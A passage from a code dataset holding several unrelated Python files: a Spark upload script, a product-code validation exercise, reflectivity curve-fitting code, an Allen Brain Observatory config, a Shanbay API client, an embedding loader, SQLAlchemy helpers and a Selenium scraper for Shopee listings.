files:\n file_path = prefix_dir+\"/\"+file_local\n part_num = int(file_local.split('-')[1])\n part_key = '{:05d}'.format(part_num)\n # fix name as static hash to be reproducible\n filename_hash = hashlib.sha1(\n str.encode(prefix_key+part_key)).hexdigest()\n\n blob_key = \"{}/{}/part-{}-{}.snappy.parquet\".format(\n path_out_all, prefix_key, part_key, filename_hash)\n\n # print(\"upload \" + file_path + \" to \" + container_out+\":\"+blob_key)\n # upload_blob(blob_service_client,container_out, blob_key, file_path)\n future = executor.submit(\n upload_blob, blob_service_client, container_out, blob_key, file_path)\n 
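# (added note) each Future is collected so the loop below can wait for all uploads\n                    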
afutures.append(future)\n # else:\n # print(f\"no files to upload for {d_key}\")\n\n # else:\n # print(f\"missing partition for {d_key}\")\n # end of loop, wait for futures\n for future in afutures:\n bkey = future.result()\n\n # ensure we wait all tasks\n # TODO check if all done\n adone = concurrent.futures.wait(afutures)\n\n print(\"--- {} seconds elapsed ---\".format(int(time.time() - start_time)))\n print()\n shutdown_time = time.time()\n spark.stop()\n\n end_time = time.time()\n print(\"Done in {} seconds (read:{} spark:{} upload:{} shutdown:{})\".format(\n int(end_time - start_time),\n int(spark_time - read_time),\n int(upload_time - spark_time),\n int(shutdown_time - upload_time),\n int(end_time - shutdown_time)\n ))\n print('Done.')\n #\n # END OF CODE\n #\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/stop_user_clusters-v5.py","file_name":"stop_user_clusters-v5.py","file_ext":"py","file_size_in_byte":23107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"31112500","text":"#Imagine you're writing the software for an inventory system for\r\n#a store. Part of the software needs to check to see if inputted\r\n#product codes are valid.\r\n#\r\n#A product code is valid if all of the following conditions are\r\n#true:\r\n#\r\n# - The length of the product code is a multiple of 4. It could\r\n# be 4, 8, 12, 16, 20, etc. characters long.\r\n# - Every character in the product code is either an uppercase\r\n# character or a numeral. No lowercase letters or punctuation\r\n# marks are permitted.\r\n# - The character sequence \"A1\" appears somewhere in the\r\n# product code.\r\n#\r\n#Write a function called valid_product_code. valid_product_code\r\n#should have one parameter, a string. It should return True if\r\n#the string is a valid product code, and False if it is not.\r\n\r\n\r\n#Add your code here!\r\ndef valid_product_code(a_str):\r\n valid = []\r\n if len(a_str)%4 ==0:\r\n if \"A1\" in a_str:\r\n #print(len(a_str), \"char in str\")\r\n for c in a_str:\r\n #print(ord(c))\r\n if ord(c) in range(65,91) or ord(c) in range(48,58):\r\n valid.append(\"True\")\r\n \r\n else:\r\n valid.append(\"False\")\r\n \r\n else:\r\n #print(\"No A1 in str\")\r\n valid.append(\"False\")\r\n else:\r\n #print(\"longueur incorrecte\")\r\n valid.append(\"False\") \r\n #print (valid) \r\n if \"False\" in valid:\r\n return False\r\n else:\r\n return True\r\n \r\n \r\n#Remember, capital letters have ordinal numbers between 65\r\n#(\"A\") and 90 (\"Z\"). 
You may use the ord() function to get\r\n#a letter's ordinal number.\r\n\r\n#Below are some lines of code that will test your function.\r\n#You can change the value of the variable(s) to test your\r\n#function with different inputs.\r\n#\r\n#If your function works correctly, this will originally\r\n#print: True, True, False, False, False\r\nprint(valid_product_code(\"A12B44BP\"))\r\nprint(valid_product_code(\"BFDSAUSA98932RWEFOEWA9FEAA1DSFSF\"))\r\nprint(valid_product_code(\"A1BBD5\"))\r\nprint(valid_product_code(\"BDD5664S\"))\r\nprint(valid_product_code(\"66aBSaA1fdsv\"))\r\nprint(valid_product_code(\"BFDSAUSA98932RWEFOEWA9FEAA1DSFSF\"))\r\n","sub_path":"Valide product code.py","file_name":"Valide product code.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"411150138","text":"from numpy import sqrt, square, divide, inf\nfrom scipy.optimize import curve_fit\n\ndef s1_2(q_R,c1_2):\n return c1_2*q_R[0] # q\n\ndef t(q_R, c3, c4):\n return c3 + c4*square(q_R[0]) # q\n\ndef Rs(q_R): #simulated reflectivity\n return q_R[1] # R\n\ndef nb(q_R, i, c1_2, c3, c4, c5):\n return (i*c5*\n t(q_R, c3, c4)*\n square(s1_2(q_R,c1_2)))\n\ndef ns(q_R, i, c1_2, c3, c4):\n return i*( Rs(q_R)*\n t(q_R, c3, c4)*\n square(s1_2(q_R,c1_2)) )\n\ndef func_dR_R1(q_R, i, c1_2, c3, c4, c5):\n out = divide( sqrt(q_R[1]+2*c5),\n Rs(q_R)*sqrt(i*t(q_R, c3, c4)*\n square( s1_2(q_R,c1_2) )) )\n return out\n\ndef func_dR_R2(q_R, i, c1_2, c3, c4, c5):\n return ( sqrt( ns(q_R, i, c1_2, c3, c4)+\n 2*nb(q_R, i, c1_2, c3, c4, c5) ) /\n ns(q_R, i, c1_2, c3, c4) )\n\ndef dR_R_func(q_R, i, c1_2, c3, c4, c5): # difrent\n return divide( sqrt(ns(q_R, i, c1_2, c3, c4)+\n 2*c5),\n ns(q_R, i, c1_2, c3, c4) )\n\n# def dR_R_func2(q_R, i, c1_2, c3, c4, c5): # difrent\n# return divide( sqrt(ns(q_R, i, c1_2, c3, c4)+\n# 2*c5),\n# ns(q_R, i, c1_2, c3, c4) )\n\ndef func_(q_R, i, c1_2, c3, c4, c5):\n pass\n\ndef main(sim_q=None, sim_R=None, sim_dR=None, file=\"SimDataBase_29553_54.dat\"):\n # 29553_54.dat\n func = func_dR_R2\n# file = \"29553_54.dat\"\n import data_in\n data = data_in.data_in(file)\n q = data[0]\n R = data[1]\n dR = data[2]\n q_R = [q,R]\n if sim_q is None:\n sim_q = q\n if sim_R is None:\n sim_R = R\n if sim_dR is None:\n sim_dR = dR\n #[i, c1_2, c3, c4, c5]\n bounds = (0,inf)#[(0,inf),(0,inf),(0,inf),(0,inf),(0,inf)]# \n dR_R = divide(dR, R)\n out_opt, out_covar = curve_fit(func, q_R, dR_R,bounds=bounds)\n print(\"out \",out_opt,\"\\nvar: \", out_covar)\n sim_dR_R = func([sim_q, sim_R], *out_opt)\n #print(q,R,dR)\n return sim_dR_R*sim_R\n\n\n\nclass tester:\n def __init__(self,ins=False,q=[],R=[],dR=[], cs=[]):\n import numpy as np\n if not ins:\n q = [1.,2.,3.,4.]\n R = [2*x for x in q]\n dR = [x/2 for x in q]\n cs = [1.5,2.5,3.5,4.5,5.5]\n self.q = np.array(q)\n #self.q = []\n self.R = np.array(R)\n self.q_R = np.array([q,R])\n self.dR = np.array(dR)\n self.cs = np.array(cs)\n \n def __call__(self, func=None):\n q_R, i, c1_2, c3, c4, c5 = self.q_R, self.cs[0], self.cs[1], self.cs[2], self.cs[3], self.cs[4]\n if func is None:\n func = [self.s1_2, self.t, self.Rs, self.nb, self.ns, self.func_dR_Rs]\n if not hasattr(func, '__iter__'):\n #q_R, c1_2, c3, c4, c5\n func = [func]\n outs = [f(q_R, i, c1_2, c3, c4, c5) for f in func]\n print(outs)\n self.printout(outs)\n\n def printout(self,outs):\n if hasattr(outs, '__iter__'):\n outs = all(outs)\n print(\"results: \", outs)\n \n def s1_2(self, q_R, i, c1_2, c3, c4, c5):\n reqs = 
[c1_2*x==s for x,s in zip(self.q,s1_2(q_R, c1_2))]\n return all(reqs)\n\n def t(self, q_R, i, c1_2, c3, c4, c5):\n outs = [(c3+c4*(x**2))==ts for x,ts in zip(self.q,t(q_R, c3, c4))]\n return all(outs)\n\n def Rs(self, q_R, i, c1_2, c3, c4, c5):\n outs = [x==r for x,r in zip(Rs(q_R),self.R)]\n return all(outs)\n\n def nb(self, q_R, i, c1_2, c3, c4, c5):\n outs = [i*c5*( (c3+c4*(x**2))*\n ((c1_2*x)**2) )==n for x,n in zip(self.q,\n nb(q_R, i, c1_2, c3, c4, c5))]\n return all(outs)\n \n def ns(self, q_R, i, c1_2, c3, c4, c5):\n comp = [i*rs*( (c3+c4*(x**2))*\n ((c1_2*x)**2) ) for x,rs in zip(self.q,self.R)]\n outs = [x==n for x,n in zip(comp,\n ns(q_R, i, c1_2, c3, c4))]\n return all(outs)\n \n def func_dR_Rs(self, q_R, i, c1_2, c3, c4, c5):\n result1 = [self.aprox_equal(out1,out2) for out1,out2 in zip( func_dR_R1(q_R, i, c1_2, c3, c4, c5),\n func_dR_R2(q_R, i, c1_2, c3, c4, c5) )]\n result2 = [out1==out2 for out1,out2 in zip( func_dR_R1(q_R, i, c1_2, c3, c4, c5), # will not be equal\n dR_R_func(q_R, i, c1_2, c3, c4, c5) )]\n result3 = [out1==out2 for out1,out2 in zip( func_dR_R2(q_R, i, c1_2, c3, c4, c5), # will not be equal\n dR_R_func(q_R, i, c1_2, c3, c4, c5) )]\n print(result1)\n return ( all(result1) and# all(result2), all(result3),\n self.nb(q_R, i, c1_2, c3, c4, c5) and\n self.ns(q_R, i, c1_2, c3, c4, c5) )\n\n def aprox_equal(self,one,two,aprox=0.00005):\n return two<=one+aprox and two >=one-aprox\n\n\nif __name__ == '__main__':\n if False:\n import numpy as np\n a = np.linspace(1,5,num=5) # 1,2,3,4,5\n b = np.linspace(6,10,num=5) # 6,7,8,9,10\n c = np.array([a,b]) # [1,2,3,4,5],[6,7,8,9,10]\n d = np.transpose(c)# [1,6],[2,7],[3,8],[4,9],[5,10]\n print(a,b,c,c[1],c[1,:],d, d[1,:]) #c[1], c[1,:] = [6,7,8,9,10]\n file = \"29553_54.dat\"\n import data_in\n data = data_in.data_in(file)\n print(data[0],data[:,0])\n elif True:\n print(\"testing...\")\n test = tester()\n test()\n else:\n main()\n \n ","sub_path":"make_sim_data.py","file_name":"make_sim_data.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"485233706","text":"# Config\nimport os\nimport socket\n\n\nclass Allen_Brain_Observatory_Config():\n \"\"\"Config for rebuilding Allen data in a database.\"\"\"\n def get_host_path(self):\n if socket.gethostname() == 'x8':\n self.host = 'x8'\n self.repo_PATH = '/home/drew/Documents/abo_data'\n self.cc_path = '/home/drew/Documents/contextual_circuit_bp'\n elif socket.gethostname() == 'x9':\n self.host = 'x9'\n self.repo_PATH = '/home/drew/Documents/abo_data'\n self.cc_path = '/home/drew/Documents/contextual_circuit_bp'\n self.cluster_cc_path = '/media/data_cifs/cluster_projects/contextual_circuit_bp'\n else:\n raise Exception(\n 'Unknown Host : Please add your directory at get_host_path()')\n\n def __init__(self, **kwargs):\n self._id = ''\n \"\"\" Directories\"\"\"\n self.get_host_path()\n self.log_dir = 'logs'\n self.DB_loc = 'DataForTrain'\n self.exp_method_template_dir = 'CCBP_experiment_templates'\n self.exp_data_template_dir = 'CCBP_dataset_templates'\n self.cc_template = os.path.join(\n self.exp_data_template_dir,\n 'template_cc_model.txt')\n self.tmp_pachaya_folder = 'pachaya_scripts' # Holding old files here\n self.data_loc = os.path.join(\n '%smedia' % os.path.sep,\n 'data_cifs',\n 'AllenData')\n self.tf_record_output = os.path.join(\n '%smedia' % os.path.sep,\n 'data_cifs',\n 'contextual_circuit',\n 'tf_records')\n self.ccbp_exp_evals = os.path.join(\n '%smedia' % os.path.sep,\n 
'data_cifs',\n 'contextual_circuit',\n 'experiment_evaluations')\n self.deconv_model_dir = os.path.join(\n self.data_loc,\n 'deconv_models')\n self.model_struct_dir = os.path.join(\n self.cc_path,\n 'models',\n 'structs')\n self.model_template_dir = os.path.join(\n self.model_struct_dir,\n 'template_ALLEN')\n self.model_prefix = 'auto_generated_'\n\n # TODO: Document these parameters\n # Parameters\n self.rf_shuffles = 5000\n self.alpha = 0.5\n self.FILTERS = True\n self.filters_file = os.path.join( # None if no filters\n self.repo_PATH,\n 'filters_VISp_175_sigNS_nonzeroNM_reliableRF.pkl')\n self.data_set_code = 'Area-VISp_Depth-175um_NS-sig_NMall-nonzero_LSN-rfChi2-0.05_allStim-true'\n self.cells_pkl = 'all_cells_RF_info_08_30_17.pkl'\n\n # Order for Name Code\n # Area / depth / Stimuli - SG, DG, NS, NM, LSN / aShow only\n # data with results from all stimuli allStim = True\n self.RESHAPE_IMG_NS = True\n self.reshape_img_size_h = 31\n self.reshape_img_size_w = 31\n self.save_folder = 'DataForTrain/'\n self.db_ssh_forward = False\n\n # Template for cc_bp repo data loading\n self.multi_exps = 'multi_cell_exps'\n self.cc_data_dir = os.path.join(\n self.cc_path,\n 'dataset_processing')\n self.manifest_file = os.path.join(\n self.data_loc,\n 'boc/manifest.json')\n self.all_exps_csv = os.path.join(\n self.tmp_pachaya_folder,\n 'all_exps.csv')\n self.stimulus_template_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'all_stimulus_template')\n self.RF_info_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'all_RFs_info')\n self.imaging_response_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'all_imaging_responses')\n self.fluoresence_type = 'dff_traces_loc' # 'fluorescence_traces'\n self.fluorescence_traces_loc = os.path.join(\n self.imaging_response_loc,\n self.fluoresence_type)\n self.ROIs_mask_loc = os.path.join(\n self.imaging_response_loc,\n 'ROIs_mask')\n self.stim_table_loc = os.path.join(\n self.imaging_response_loc,\n 'stim_tables')\n self.specimen_recording_loc = os.path.join(\n self.imaging_response_loc,\n 'specimen_recording')\n self.output_pointer_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'output_pointers')\n self.Allen_analysed_stimulus_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'Allen_stimulus_analysis',\n 'By_cell_ID')\n self.precal_matrix_loc = os.path.join(\n self.data_loc,\n self.DB_loc,\n 'Allen_stimulus_analysis',\n 'By_container_ID')\n\n # Brain Observatory project information\n self.stim = {\n 'DG': 'drifting_gratings',\n 'LSN': 'locally_sparse_noise',\n 'LSN4': 'locally_sparse_noise_4deg',\n 'LSN8': 'locally_sparse_noise_8deg',\n 'NM1': 'natural_movie_one',\n 'NM2': 'natural_movie_two',\n 'NM3': 'natural_movie_three',\n 'NS': 'natural_scenes',\n 'Spon': 'spontaneous',\n 'SG': 'static_gratings'\n }\n self.session = {\n 'A': u'three_session_A',\n 'B': u'three_session_B',\n 'C': u'three_session_C',\n 'C2': u'three_session_C2'\n }\n self.sess_with_number = {\n 'locally_sparse_noise_4deg': 'locally_sparse_noise_four_deg',\n 'locally_sparse_noise_8deg': 'locally_sparse_noise_eight_deg'}\n self.session_RF_stim = {\n 'C': ['locally_sparse_noise'],\n 'C2': [\n 'locally_sparse_noise_4deg',\n 'locally_sparse_noise_8deg'\n ],\n }\n self.session_name_for_RF = [\n 'locally_sparse_noise',\n 'locally_sparse_noise_4deg',\n 'locally_sparse_noise_8deg'\n ]\n self.LSN_size_in_deg = {\n 'height': 74.4,\n 'width': 130.2\n }\n self.RF_sign = ['on', 'off']\n self.pick_main_RF = [\n 'locally_sparse_noise',\n 'locally_sparse_noise_8deg'\n ]\n 
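# Note (added): the stimulus names below mirror the Allen SDK identifiers; session C\n        # exposes 'locally_sparse_noise' while C2 splits it into the 4deg/8deg variants,\n        # which is why both spellings appear in these lists.\n        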
self.available_stims = [\n            'locally_sparse_noise',\n            'locally_sparse_noise_4deg',\n            'locally_sparse_noise_8deg',\n            'natural_movie_one',\n            'natural_movie_three',\n            'natural_movie_two',\n            'natural_scenes'\n        ]\n","sub_path":"allen_config.py","file_name":"allen_config.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"216084347","text":"# -*- coding: utf-8 -*-\nfrom .auth import Auth\nfrom .model import DeskmatePlanModel as DeskmatePlanModelBase, DeskmateModel\n\n\nclass DeskmatePlanModel(DeskmatePlanModelBase):\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n\n    def deskmate_profile(self):\n        for up in self.user_profile:\n            if up.user.shanbay_id != self.shanbay_id:\n                return up\n\n    def my_profile(self):\n        for up in self.user_profile:\n            if up.user.shanbay_id == self.shanbay_id:\n                return up\n\n    def deskmate_days(self):\n        return max(cd.user_checkin_days for cd in self.checkin_data)\n\n\nclass DeskmatePlanList(list):\n    def __init__(self, deskmate_plans):\n        super().__init__(deskmate_plans)\n\n    def current_deskmate(self):\n        if self and self[0].status == self[0].__class__.DOING:\n            return self[0].deskmate_profile()\n\n    def current_deskmate_days(self):\n        if self and self[0].status == self[0].__class__.DOING:\n            return self[0].deskmate_days()\n\n    def successful_plans(self):\n        scfp = __class__([])\n        for dp in self:\n            if dp.status == dp.__class__.SUCCESS:\n                scfp.append(dp)\n        return scfp\n\n    def deskmates(self, nrdt=False):\n        \"\"\"\n        Historical deskmates.\n        :param nrdt: whether to de-duplicate repeated deskmates\n        :return: list of deskmate profiles\n        \"\"\"\n        ds = []\n        sids = []\n        for dp in self:\n            if nrdt:\n                if dp.deskmate_profile().user.shanbay_id not in sids:\n                    sids.append(dp.deskmate_profile().user.shanbay_id)\n                    ds.append(dp.deskmate_profile())\n            else:\n                ds.append(dp.deskmate_profile())\n        return ds\n\n\nclass Deskmate(Auth):\n    def __init__(self, shanbay_id=None, user_id=None):\n        assert shanbay_id is not None or user_id is not None\n        self.shanbay_id = shanbay_id\n        self.user_id = user_id\n\n    def user_info(self):\n        url = 'https://www.shanbay.com/api/v2/deskmate/userinfos/'\n        params = {'user_id': self.shanbay_id or self.user_id}\n        j = __class__.request.get(url, params=params).json()\n        return DeskmateModel(**j['data'])\n\n    def fetch_deskmate_plans(self, page=1, ipp=50):\n        url = 'https://www.shanbay.com/api/v2/deskmate/userdeskmateplans/'\n        params = {\n            'user_id': self.shanbay_id or self.user_id,\n            'page': page,\n            'ipp': ipp\n        }\n        return __class__.request.get(url, params=params).json()\n\n    def ideskmate_plan(self, ipp=50):\n        page = 0\n        while True:\n            page += 1\n            _json = self.fetch_deskmate_plans(page, ipp)\n            for dp in _json['data']['objects']:\n                yield DeskmatePlanModel(**dp)\n            if _json['data']['total'] <= page * ipp:\n                break\n\n    def deskmate_plans(self, ipp=50):\n        dps = DeskmatePlanList([])\n        for dp in self.ideskmate_plan(ipp):\n            dps.append(dp)\n        return dps\n","sub_path":"bin/shanbay/deskmate.py","file_name":"deskmate.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"21242298","text":"import gensim\nimport torch\nfrom torch import nn\nfrom os.path import basename\nfrom library.utils.datasets.dictionary import START, END\n\n\ndef make_embedding(id2word, w2v_file, initializer=None):\n    \"\"\"\n    Embedding lookup table conversion, id -> vec.\n    Also returns the ids that remain out of vocabulary (OOV).\n    \"\"\"\n    attrs = basename(w2v_file).split('.')  # word2vec.{dim}d.{vsize}k.bin\n    w2v = gensim.models.Word2Vec.load(w2v_file).wv\n    vocab_size = len(id2word)\n    
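# Note (added): the embedding width is parsed out of the filename convention\n    # 'word2vec.{dim}d.{vsize}k.bin' noted above; rows for in-vocabulary words (plus\n    # the <s>/<\\s> markers mapped to START/END) are copied from the w2v matrix, and\n    # every id left uninitialized is reported back to the caller as OOV.\n    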
emb_dim = int(attrs[-3][:-1])  # '{dim}d' -> dim\n    embedding = nn.Embedding(vocab_size, emb_dim).weight\n    if initializer is not None:\n        initializer(embedding)\n\n    oovs = []\n    with torch.no_grad():\n        for i in range(len(id2word)):\n            # NOTE: id2word can be list or dict\n            if i == START:\n                embedding[i, :] = torch.Tensor(w2v['<s>'])\n            elif i == END:\n                embedding[i, :] = torch.Tensor(w2v[r'<\\s>'])\n            elif id2word[i] in w2v:\n                embedding[i, :] = torch.Tensor(w2v[id2word[i]])\n            else:\n                oovs.append(i)\n    return embedding, oovs","sub_path":"src/library/text/modules/base/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"309767800","text":"import logging\nimport traceback\nfrom datetime import datetime, timedelta\n\nfrom sqlalchemy import Column, BigInteger, create_engine, DateTime, func, Integer\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy.sql import text\nfrom sqlalchemy.orm import sessionmaker, scoped_session, Query\nfrom sqlalchemy.orm.exc import ObjectDeletedError\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.ext.hybrid import hybrid_method\nfrom flask import _app_ctx_stack\nlogger = logging.getLogger(__name__)\n\n\nclass CustomQuery(Query):\n\n    def chunked_all(self, count, commit=False,\n                    skip_errors=False, expunge_all=True):\n        \"\"\"Bring objects in chunks from the database.\n\n        :param count: chunk size\n        :param commit: commit session after fetching each chunk.\n        :param skip_errors: if commit() raises an error, skip it.\n        :param expunge_all: expunge each object after yielding it. This is\n        required for objects to be removed from the session after each\n        iteration. If False, objects will remain in the session and be sent\n        back and forth between client and database, which will eventually\n        cause slowdown.\n\n        \"\"\"\n        if skip_errors:\n            assert commit\n\n        last_id = 0\n        while True:\n            logger.debug('last_id: %s' % last_id)\n            # wrap raw SQL fragments in text(); plain strings are rejected by\n            # modern SQLAlchemy\n            query = self.filter(text('id>%s' % last_id)).order_by(text('id asc'))\n            objects = query.limit(count).all()\n            if not objects:\n                break\n\n            for obj in objects:\n                try:\n                    last_id = obj.id\n                except ObjectDeletedError:\n                    self.session.rollback()\n                    last_id += 1\n                else:\n                    yield obj\n\n            if commit:\n                if skip_errors:\n                    try:\n                        self.session.commit()\n                    except Exception:\n                        self.session.rollback()\n                        logger.warning(traceback.format_exc())\n                else:\n                    self.session.commit()\n\n            if expunge_all:\n                self.session.expunge_all()\n\n#uri = 'mysql://%s:%s@%s/%s?charset=utf8&use_unicode=1' % (\n#    config.MYSQL_USER,\n#    config.MYSQL_PASSWD,\n#    config.MYSQL_HOST,\n#    config.MYSQL_DB)\n\nuri = 'sqlite:///test.db'\n\nengine = create_engine(uri, echo=False)\nSession = sessionmaker(\n    bind=engine,\n    query_cls=CustomQuery,\n    autoflush=True,  # flush pending changes before every query\n    autocommit=False,  # True is very dangerous\n    expire_on_commit=True)  # expire object attributes after commit; the next access re-selects them from the DB.
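\n\n# Example (added, illustrative): because the session below is scoped to the Flask app\n# context, request handlers can share it through the models' query_property, e.g. for\n# a hypothetical model User(Base):\n#   user = User.query.get(1)       # SELECT via the scoped session\n#   user.update({'name': 'x'})     # uses the update() helper defined further down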
\nsession = scoped_session(Session, scopefunc=_app_ctx_stack.__ident_func__)\n\n\ndef _get_date():\n    return datetime.utcnow()\n\n\nclass TimestampMixin(object):\n\n    created_at = Column(DateTime, default=_get_date)\n    updated_at = Column(DateTime, default=_get_date, onupdate=_get_date)\n\n    def touch(self):\n        self.update({'updated_at': _get_date()})\n\n    @hybrid_method\n    def is_stuck(self, mins=10):\n        \"\"\"Has the record not been updated in the last 'mins' minutes?\"\"\"\n        if not self.updated_at:\n            return True\n        diff = datetime.utcnow() - self.updated_at\n        return diff > timedelta(minutes=mins)\n\n    @is_stuck.expression\n    def is_stuck(self, mins=10):\n        diff = func.timestampdiff(text('minute'),\n                                  self.updated_at, func.utc_timestamp())\n        # '== None' is intentional here: it builds a SQL IS NULL expression\n        return (self.updated_at == None) | (diff > mins)\n\n\nclass Base(object):\n    __table_args__ = {'mysql_engine': 'InnoDB', 'sqlite_autoincrement': True}\n\n    id = Column(Integer, primary_key=True)\n\n    # default session is the scoped session\n    query = session.query_property()\n\n    @property\n    def session(self):\n        \"\"\"Return this object's session\"\"\"\n        return Session.object_session(self)\n\n    def __repr__(self):\n        try:\n            id = self.id\n        except SQLAlchemyError:\n            id = 'Unknown'\n\n        return '<%s id=%r>' % (self.__class__.__name__, id)\n\n    @classmethod\n    def count(cls, expr=None):\n        q = session.query(func.count('*'))\n        if expr is not None:\n            q = q.filter(expr)\n        return q.scalar() or 0\n\n    @classmethod\n    def get(cls, id):\n        \"\"\"Shortcut for Model.query.get()\"\"\"\n        return cls.query.get(id)\n\n    def save(self, commit=True):\n        session.add(self)\n        if commit:\n            session.commit()\n\n    def update(self, update_dict, commit=True, where=None, _session=None):\n        if update_dict:\n            __session = _session if _session else session\n\n            # if the object has no id yet, flush first so the UPDATE below targets a real row\n            if not self.id:\n                __session.add(self)\n                __session.flush()\n\n            cls = self.__class__\n\n            query = __session.query(cls).filter(cls.id == self.id)\n\n            if where:\n                query = query.filter_by(**where)\n\n            query.update(update_dict)\n\n            __session.add(self)\n            if commit:\n                __session.commit()\n\n    def delete(self, commit=True):\n        session.delete(self)\n        if commit:\n            session.commit()\n\n    def to_dict(self, *fields):\n        '''Returns model as dict. 
If fields is given, returns only given fields.\n If you want to change the field name in returned dict,\n give a tuple like ('real_field_name', 'wanted_field_name') instead of str.'''\n d = {}\n keys = self.__table__.columns.keys()\n if fields:\n keys = fields\n \n for columnName in keys:\n if isinstance(columnName, tuple):\n d[columnName[1]] = getattr(self, columnName[0])\n else:\n d[columnName] = getattr(self, columnName)\n return d\n \n def from_dict(self, d):\n for columnName in d.keys():\n setattr(self, columnName, d[columnName])\n\nBase = declarative_base(bind=engine, cls=Base)\n","sub_path":"orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"590344208","text":"import time, os, shutil\r\nfrom datetime import date\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import TimeoutException\r\n# from phantomjs import Phantom\r\nfrom selenium.webdriver.chrome.options import Options \r\n\r\nchrome_options = Options() \r\nchrome_options.add_argument(\"--headless\")\r\nchrome_options.add_argument(\"--disable-web-security\")\r\nchrome_options.add_argument(\"--start-maximized\")\r\nchrome_options.add_argument(\"--allow-running-insecure-content\")\r\nchrome_options.add_argument(\"test-type\")\r\n\r\nclass crawlEngine():\r\n def __init__(self):\r\n self = self\r\n # self.driver = webdriver.PhantomJS(\"D:/Bifm/phantomjs.exe\",service_args=[\"--load-images=no\"])\r\n # self.driver = webdriver.PhantomJS(\"D:/Bifm/phantomjs.exe\")\r\n self.driver = webdriver.Chrome(executable_path=os.path.abspath(\"D:/Bifm/chromedriver.exe\"), options=chrome_options)\r\n self.driver.set_window_size(1920, 5000) # optional\r\n # Return page\r\n def returnPage(self,url):\r\n try:\r\n self.driver.get(url)\r\n self.waitLoadItems()\r\n self.waitLoadLastItems()\r\n self.pullJquery()\r\n except TimeoutException:\r\n self.returnPage(url)\r\n # Return page\r\n def waitLoadItems(self):\r\n driverLoad = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME, 'shopee-search-item-result__item')))\r\n # Return page\r\n def waitLoadLastItems(self):\r\n # lastUrlNum = self.driver.execute_script('return $(\".shopee-search-item-result__item\").length;')\r\n lastUrlNum = self.driver.execute_script('return document.getElementsByClassName(\"shopee-search-item-result__item\").length;')\r\n lastUrlPath = \".shopee-search-item-result__item:nth-child({}) a[data-sqe=link] > div > div:first-child > img[src]\".format(lastUrlNum)\r\n driverLoad = WebDriverWait(self.driver, 20).until(EC.presence_of_element_located((By.CSS_SELECTOR, lastUrlPath)))\r\n # Pull Jquery from CDN\r\n def pullJquery(self):\r\n self.driver.execute_script(\"\"\"var jquery_script = document.createElement('script'); \r\n jquery_script.src = 'https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';\r\n document.getElementsByTagName('head')[0].appendChild(jquery_script);\"\"\")\r\n # time to load jQuery library\r\n time.sleep(1)\r\n # Define global variable Jquery - $\r\n self.driver.execute_script('$ = window.jQuery;')\r\n # Screenshoot page\r\n def pullImage(self,name):\r\n path = \"D:/Bifm/test/images/\"\r\n if ( os.path.exists(path + name) == False ):\r\n os.mkdir(path + 
name)\r\n self.driver.save_screenshot( path + name + '/result_{}.png'.format(int(time.time())))\r\n def pullItemImages(self,items):\r\n today = date.today()\r\n path = \"D:/Bifm/Bigdata/imageItem/\" + str(today)\r\n if ( os.path.exists(path) == False ):\r\n os.mkdir(path)\r\n # else:\r\n # # shutil.rmtree(path)\r\n newItems = items\r\n for j,item in enumerate(items):\r\n if 0 <= j <= 2:\r\n driver = webdriver.PhantomJS(\"D:/Bifm/phantomjs.exe\",service_args=[\"--load-images=no\"])\r\n # driver.set_window_size(1920, 1080)\r\n driver.get(item['image'])\r\n # driver.get_screenshot_as_file( path + \"/\" + file )\r\n driver.save_screenshot( path + '/bifm_{}.png'.format(int(time.time())) )\r\n file = \"bifm_{}.png\".format(int(time.time()))\r\n newItems[j][\"image\"] = file\r\n driver.close()\r\n driver.quit()\r\n else: break\r\n return newItems\r\n # Define function checkLastPage\r\n def checkLastPage(self):\r\n try:\r\n # Check if current page is last page\r\n isLPage = self.driver.execute_script('''\r\n function checkLastPage(){\r\n if ( $(\".shopee-page-controller .shopee-button-solid--primary\").next().hasClass(\"shopee-icon-button--right\") ){\r\n return true;\r\n }\r\n return false;\r\n }\r\n return checkLastPage();''')\r\n return isLPage\r\n except Exception as e:\r\n print(str(e))\r\n return \"Crawl_failure\"\r\n # Define function collectItems\r\n def collectItems(self,name):\r\n today = str(date.today())\r\n try:\r\n # Assign data crawl from json to arr_items\r\n items = self.driver.execute_script('''var arr_item = [];\r\n function collectItems(){\r\n for(var i = 0; i < $(\"div[data-sqe=name]\").length; i++){\r\n var item = {\r\n title: $(\"div[data-sqe=name] > div:first-child\").eq(i).text(),\r\n price: $(\"div[data-sqe=name]\").eq(i).next().find(\"div\").text(),\r\n image: $(\"a[data-sqe=link]\").eq(i).find(\"div > div:first-child > img\").attr(\"src\"),\r\n datecol: \"'''+today+'''\",\r\n name: \"'''+name+'''\"\r\n }\r\n 